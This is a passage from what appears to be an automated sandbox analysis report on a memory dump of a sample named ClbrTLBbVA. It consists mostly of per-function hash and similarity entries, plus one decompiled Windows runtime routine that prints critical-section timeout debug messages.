                                        • Opcode ID: 8f12a8591a2503e11a05466bd8e5ead68e6247469e347fdb517525e2d35d6cf2
                                        • Instruction ID: 5a91c6155eeaf3d625317c03b36417179b877cda2ba9e62fb15380235d0eaa3b
                                        • Opcode Fuzzy Hash: 8f12a8591a2503e11a05466bd8e5ead68e6247469e347fdb517525e2d35d6cf2
                                        • Instruction Fuzzy Hash: 1D9002E1201140924500A6998805B0B4509A7E0241B52C01AE2044560CC5659851B175
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016EAD30 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33f4326784f018cd9544f907c6578e8a122dd9fadd9b1dc4732a51bbd2456407
                                        • Instruction ID: a6bd6fe385c3b7da3c861bbf7f5e5c6d06d9ecc4db4339772c7514baa25550eb
                                        • Opcode Fuzzy Hash: 33f4326784f018cd9544f907c6578e8a122dd9fadd9b1dc4732a51bbd2456407
                                        • Instruction Fuzzy Hash: B3900271A0500012914075994C15747400AB7E0781B56C015A1504554CC9949A5573E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E95F0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: abdaae66f2d762c4447753da7a3dc6f4df4c264773ecf857e258acaa652e56c6
                                        • Instruction ID: f3f338f77b9017a759e845729df74f1280837e0f84a14cd8c84469c2b9a51df6
                                        • Opcode Fuzzy Hash: abdaae66f2d762c4447753da7a3dc6f4df4c264773ecf857e258acaa652e56c6
                                        • Instruction Fuzzy Hash: AE90027120100802D10465994C057870009A7D0341F52C015A7014655ED6A598917171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E99D0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b4703ec64e3b071b0c05070243a77f1fdc690625295cfd81ffc12d7e8d7b622
                                        • Instruction ID: 545aa9395a444855b9ab0f1a634f20730381d2ab8aac85fc575b212dcaabb0c2
                                        • Opcode Fuzzy Hash: 1b4703ec64e3b071b0c05070243a77f1fdc690625295cfd81ffc12d7e8d7b622
                                        • Instruction Fuzzy Hash: 929002A121100042D104659948057070049A7E1241F52C016A3144554CC5699C617165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016EB040 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b104abae8796527e1c03131eb23e28cf32879de7a5ed57c719fcf8afad0cd35
                                        • Instruction ID: 8d21747d495459fb4bd3e81f883c57a1d93db78042857883ec8eb3ab5647bcbf
                                        • Opcode Fuzzy Hash: 7b104abae8796527e1c03131eb23e28cf32879de7a5ed57c719fcf8afad0cd35
                                        • Instruction Fuzzy Hash: FB9002A1601140434540B5994C055075019B7E1341392C125A1444560CC6A89855B2A5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9820 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba06866f4c6f02d9a3e7ed4f4a3654dc947cd8e2155572c182397294e2cac250
                                        • Instruction ID: a9f386d5ae56b508e2f9aeff346331a2024c3d938e146ac35061dbf4d71a96c0
                                        • Opcode Fuzzy Hash: ba06866f4c6f02d9a3e7ed4f4a3654dc947cd8e2155572c182397294e2cac250
                                        • Instruction Fuzzy Hash: 4E90027124100402D14175994805707000DB7D0281F92C016A1414554EC6959A56BAA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E98A0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f50a35729c3c4188222d3c1730b16c8469118a5b92aa7e1adeb68323316174d0
                                        • Instruction ID: fda951defd401ef873aaa8e4a71864329315410f6d6966dee5661df3ff07f0b9
                                        • Opcode Fuzzy Hash: f50a35729c3c4188222d3c1730b16c8469118a5b92aa7e1adeb68323316174d0
                                        • Instruction Fuzzy Hash: 4D90026130100402D10265994815707000DE7D1385F92C016E2414555DC6659953B172
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9760 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d626fe5d69094d0d5fdb9638093f4b7974398eee5aeb8ffa2ef668eac59a1f76
                                        • Instruction ID: adffba8b1852c05139b5df19d1566c4808c8f9fc5a3027baf5c564dafc507808
                                        • Opcode Fuzzy Hash: d626fe5d69094d0d5fdb9638093f4b7974398eee5aeb8ffa2ef668eac59a1f76
                                        • Instruction Fuzzy Hash: 5090027120100403D100659959097070009A7D0241F52D415A1414558DD69698517161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9770 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd75c21d9682ba1a639477125e46080a009c0b0a15c026e2db7964024877e122
                                        • Instruction ID: 56b03a8fbab017b252635697206c5dd097475f85df74d88b042904ae1bfeef55
                                        • Opcode Fuzzy Hash: fd75c21d9682ba1a639477125e46080a009c0b0a15c026e2db7964024877e122
                                        • Instruction Fuzzy Hash: EA90026120504442D10069995809B070009A7D0245F52D015A2054595DC6759851B171
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016EA770 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af80d96e6494afb0184ebaab2e24c8ed2b76858dc20aba4a9acc49eb9751c716
                                        • Instruction ID: df41819c4f336e155ecbafdfce7940add94d6fb27922d3ad445b99741278fa79
                                        • Opcode Fuzzy Hash: af80d96e6494afb0184ebaab2e24c8ed2b76858dc20aba4a9acc49eb9751c716
                                        • Instruction Fuzzy Hash: 6590027520504442D50069995C05B870009A7D0345F52D415A141459CDC6949861B161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9730 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73318c3edf72a5a13f4528bc185aed3c8b9f72e3f36ae1055e61a04885b3e6cf
                                        • Instruction ID: 321aba148837e8e463f3c4f8327cd8320bfade466778b73d244516b08b06e405
                                        • Opcode Fuzzy Hash: 73318c3edf72a5a13f4528bc185aed3c8b9f72e3f36ae1055e61a04885b3e6cf
                                        • Instruction Fuzzy Hash: 6190026160500402D140759958197070019A7D0241F52D015A1014554DC6999A5576E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9B00 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e1d973c96d108d377ebd8c1577f5df028454e281c082b30ad836571960a158e
                                        • Instruction ID: d2b8d1cfcbd618efc83121767727f5c89a94d561640f7f5994252ff67c7b34d0
                                        • Opcode Fuzzy Hash: 3e1d973c96d108d377ebd8c1577f5df028454e281c082b30ad836571960a158e
                                        • Instruction Fuzzy Hash: 8690026124100802D14075998815707000AE7D0641F52C015A1014554DC656996576F1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016EA710 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9876239e3dd8fefc11738241485efd5b421b855f4b4cb921cc825ac88175946
                                        • Instruction ID: adcdb03d605a78c7264824d13f43034a016f33d9aa953b497cd841167e791322
                                        • Opcode Fuzzy Hash: f9876239e3dd8fefc11738241485efd5b421b855f4b4cb921cc825ac88175946
                                        • Instruction Fuzzy Hash: CB900271301000529500AAD95C05B4B4109A7F0341B52D019A5004554CC59498617161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9FE0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f437bdd2de6bc8e21ee6f42a3aabf5c57c7503c0b1127fe9eabc134ff571f645
                                        • Instruction ID: aaa5ae5f170f2e882691bbb4e266c5b332692a3e76bc574cd502743801ea72d0
                                        • Opcode Fuzzy Hash: f437bdd2de6bc8e21ee6f42a3aabf5c57c7503c0b1127fe9eabc134ff571f645
                                        • Instruction Fuzzy Hash: F190027131114402D110659988057070009A7D1241F52C415A1814558DC6D598917162
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016EA3B0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 11930f91515428998e810dde78cbc6f33789d41d21bbeaab51ac9bcac21c819e
                                        • Instruction ID: c0895cae7dbda6b7d7d51d0084d4a4bcca146572430878c37bb58d3bcc607d74
                                        • Opcode Fuzzy Hash: 11930f91515428998e810dde78cbc6f33789d41d21bbeaab51ac9bcac21c819e
                                        • Instruction Fuzzy Hash: 3090027120144002D1407599884570B5009B7E0341F52C415E1415554CC6559856B261
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9650 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f47bed1faf308b73ea41ad018fc401565b753e1632b63a395241b30d7382be25
                                        • Instruction ID: c7f9d55bcb1fcb386fb3dcc11d9565ce70437016c9e51322c7c338b8b5b9049a
                                        • Opcode Fuzzy Hash: f47bed1faf308b73ea41ad018fc401565b753e1632b63a395241b30d7382be25
                                        • Instruction Fuzzy Hash: 2E90027120504842D14075994805B470019A7D0345F52C015A1054694DD6659D55B6A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9A10 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ced268d2b0a2973707ca315cbdeec3d131b3426a3541cf440b981db8ae98b50f
                                        • Instruction ID: a4ccbf7420d94b6d47387c5ada8917cab82c70697e08817efdf829f467c9a979
                                        • Opcode Fuzzy Hash: ced268d2b0a2973707ca315cbdeec3d131b3426a3541cf440b981db8ae98b50f
                                        • Instruction Fuzzy Hash: 6F90027120140402D10065994C097470009A7D0342F52C015A6154555EC6A5D8917571
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9610 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b842dbdc5d3296431ef3ac3b3f2b65961cf84c7cd02a23e3210f411446ee10cf
                                        • Instruction ID: 6d01186eb390ab3f855346e6b941cbae2b753258f3f5427ddb00537399cbe289
                                        • Opcode Fuzzy Hash: b842dbdc5d3296431ef3ac3b3f2b65961cf84c7cd02a23e3210f411446ee10cf
                                        • Instruction Fuzzy Hash: 9190027160500802D150759948157470009A7D0341F52C015A1014654DC7959A5576E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E96D0 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d64dbb3c550fae1983bf014866e626808626f86eb9e91804c1e0eaabf47b32e
                                        • Instruction ID: 0ee4392a02b19cec33a83ebcd67f60a57e6c941f6afacea81658c756c7ff818d
                                        • Opcode Fuzzy Hash: 8d64dbb3c550fae1983bf014866e626808626f86eb9e91804c1e0eaabf47b32e
                                        • Instruction Fuzzy Hash: E590027120100842D10065994805B470009A7E0341F52C01AA1114654DC655D8517561
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9A80 Relevance: .0, Instructions: 4COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 465b8b9ebf81518b9f2d622fe5b644d64a8816ed43093be1ee83e57124ce3662
                                        • Instruction ID: 80551082fcc5ac7bc9a5ab85709c5040f0c33baafff898855ac47295b5385010
                                        • Opcode Fuzzy Hash: 465b8b9ebf81518b9f2d622fe5b644d64a8816ed43093be1ee83e57124ce3662
                                        • Instruction Fuzzy Hash: 9B90026120144442D14066994C05B0F4109A7E1242F92C01DA5146554CC95598557761
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction ID: aa3e76fb3ee51c539d3c77821f9c814e4164cfc1b208e722a4c6ee76d31fa453
                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                        • Instruction Fuzzy Hash:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0173FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E0173FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E016ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01735720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01735720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                        0x0173fdda
                                        0x0173fde2
                                        0x0173fde5
                                        0x0173fdec
                                        0x0173fdfa
                                        0x0173fdff
                                        0x0173fe0a
                                        0x0173fe0f
                                        0x0173fe17
                                        0x0173fe1e
                                        0x0173fe19
                                        0x0173fe19
                                        0x0173fe19
                                        0x0173fe20
                                        0x0173fe21
                                        0x0173fe22
                                        0x0173fe25
                                        0x0173fe40

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0173FDFA
                                        Strings
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0173FE01
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0173FE2B
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                        • API String ID: 885266447-3903918235
                                        • Opcode ID: 7452503d900f599bf1040efa2d151cad37b3b2e0a6794bd8db7fbec0cac05ed2
                                        • Instruction ID: 4a2a13a3650599f1a208bee0596b2a3399ff4e5f8d8fee6b38ded96a4ec2dbf8
                                        • Opcode Fuzzy Hash: 7452503d900f599bf1040efa2d151cad37b3b2e0a6794bd8db7fbec0cac05ed2
                                        • Instruction Fuzzy Hash: 5CF0F672640601BFEB211A45DC06F23BF5AEB84B70F140318F628561E2EA62F82086F5
                                        Uniqueness

                                        Uniqueness Score: -1.00%